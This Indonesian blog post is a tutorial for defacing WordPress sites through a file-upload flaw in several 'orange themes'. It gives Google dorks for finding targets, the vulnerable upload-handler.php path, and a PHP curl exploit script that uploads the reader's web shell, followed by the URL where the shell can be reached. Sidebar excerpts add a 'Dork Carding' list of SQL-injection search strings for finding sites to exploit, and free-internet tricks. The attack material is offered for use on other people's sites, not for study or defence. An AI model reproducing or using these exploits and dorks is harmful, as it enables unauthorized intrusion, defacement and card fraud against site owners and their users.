Skip to main content

Tutorial Deface Dengan Exploit orange themes File Upload

deface, hacking,Assalamualaikum , Karena sudah lama tidak share Tutorial karena saya Sekarang Sibuk dalam Bekerja , Kali ini saya dapat Kesempatan Untuk Membuat Tutor lagi :)

Alhamdulillah :D

Oke , tanpa basa-basi , langsung saja .

Pertama , Karena Judulnya orange themes File Upload , Maka ada beberapa Themes yang Sama Vuln dengan itu ,


  • inurl:"/wp-content/themes/bordeaux-theme/"
  • inurl:"/wp-content/themes/bulteno-theme/"
  • inurl:"/wp-content/themes/oxygen-theme/"
  • inurl:"/wp-content/themes/radial-theme/"
  • inurl:"/wp-content/themes/rayoflight-theme/"
  • inurl:"/wp-content/themes/reganto-theme/"
  • inurl:"/wp-content/themes/rockstar-theme/"  

 Sekarang , Gunakan 1 Dork Di atas .

Saya akan mengambil 1 Dork . 

Yaitu :inurl:"/wp-content/themes/bordeaux-theme/"

Lalu , Jika Sudah dapat kan target , ex: www.site.com/wp-content/themes/bordeux-theme/

Anda tambahkan Vuln nya , /functions/upload-handler.php

Maka targetnya akan menjadi www.site.com/wp-content/themes/bordeux-theme/functions/upload-handler.php

Jika Keluar Error maka Site Itu Vuln :D


nah Sebelum mengeksekusikan Target ini , yang anda butuh kan adalah :
  1. Xammp , Anda bisa download XAMMP di google, saya rasa sudah banyak bertebaran , lalu Install .
  2. Jika Sudah , Buka Folder Xammp > terus buka lagi Folder PHP , Dan cari code PHP.INI , Tekan Control + F / CTRL + F , Ketikkan curl Lalu enter , jika ketemu Delete (;) Tanpa tanda kurung () , Lalu Jika tidak menemukan tanda ; ini berarti kamu sudah succes ..
  3. Letakkan Shell Anda di Folder Xammp - Folder PHP , contoh Shell ex : up.php
Jika 3 cara diatas sudah selesai sekarang kita akan Mengeksekusikan Target ..

Copykan Exploit ini 
<?php
$uploadfile="upload.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


Dan Save dengan extention .php , Disini saya akan save dengan File bernama x.php , Simpan di dekat Folder Xammp - Folder PHP ..
Tepat dimana anda letak Shell anda tadi ..

Ingat , nama shell saya ada up.php 
Maka di bagian exploit tadi 


$uploadfile="upload.php"; <-- upload.php rename menjadi up.php 

Jika sudah Save Kembali :))

Sekarang .

Buka Xammp Anda , Disini Jika xammp anda termasuk Versi lama , maka anda harus masuk ke folder xammp nya langsung 

Cara nya 

ketik : cd\ Lalu tekan Enter 
Lalu Jika CMD anda kembali ke System C atau seperti ini
C:\Documents and Settings\Alliance>cd\

C:\>
Maka sudah berhasil , Sekarang selanjutnya tekan cd /xammp/php tekan Enter
Jika Sudah Jlankan Exploitnya , tadi nama Exploit saya adalah x.php maka cara menjalankannya seperti ini ..
cd:\xammp\php\>: php x.php Dan tekan Enter ..
Jika Keluar tulisan nama shell anda di CMD atau Command Promd tadi maka SUCCES xD
Shell acces , www.site.com/wp-content/uploads/2013/11/up.php
Jika masih bingung , Kamu bisa Commentar di blog ini .
:)
Labels:

Comments

Post a Comment

Popular posts from this blog

Dord Carding 2014

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview....
Post a Comment
Read more

[Update 06-09-2016] Config open vpn sc three jabar only.

Assalamualaikum gan/sist kali ini saya akan share config open vpn update dari postingan sebelumnya. ga usah banya tanya lah langsung aja ini bukti konek. terus tanpa saweran juga pokonya tanpa pulsa tanpa kuota. hehehe Dan bukti kedua  Langsung saja saya kasih bahan sama Triknya untuk gratisan. Aplikasi Open Vpn Client Ambil Di Sini [Download]. Config Open Vpnya Ambil Di Sini [Download]. Tentunya Hp Android :v Jangan lupa sambil ngopi Jangan lupa juga mandi dulu :D Dan dua bahan tersebut harus di download soalnya kalo tanpa itu ga akan bisa gratisa. Ya segitu saja dari saya, semoga gratisanya di pergunakan dengan baik :D NOTE: Jika ada yang bingung atau mau bertanya silahkan hubungi saya via Facebook Thanks Wasalam.
1 comment
Read more

Cara Memakai SSH + Injek Di Pc (VIDEO)

Asslamualaikum Wrwb. Nah berhubung banyak yang request cara memakai ssh dan injek, Jadi malam ini saya akan share cara memakai ssh dan injek di pc, dalam bentuk video supaya mempermudah bagi para pemula. Nah apa sih ssh itu? Munggkin kebanyakan orang ssh adalah untuk berinternet gratis . Dan ini menurut ( Wikipedia) . Dan apa sih kegunaan injek itu. Bagi saya injek adalah tool pendorong untuk internet gratis dan pendorong ssh. Sudah cukup jelas? Dan ini adalah bahan bahan yang di butukan sebelum memulai tutorial. Bitvise Download Proxyfier Download Injek Download   Akun SSH *Bila Ingin Akun Premium Silahkan Order Ke Admin Via Facebook Dan Ini Sedikit Penampakan Tutorianya. Dan bila semua bahan sudah di download next sekarang download video tutorialnya. Tutorial Download Di Sini  Dan sekian dari saya semoga membantu anda. Mohon maaf bila ada kesalahan. Dan bila ada masalah dengan ini silahkan kontak admin atau berkomentar dengan sopan. Terima...
Post a Comment
Read more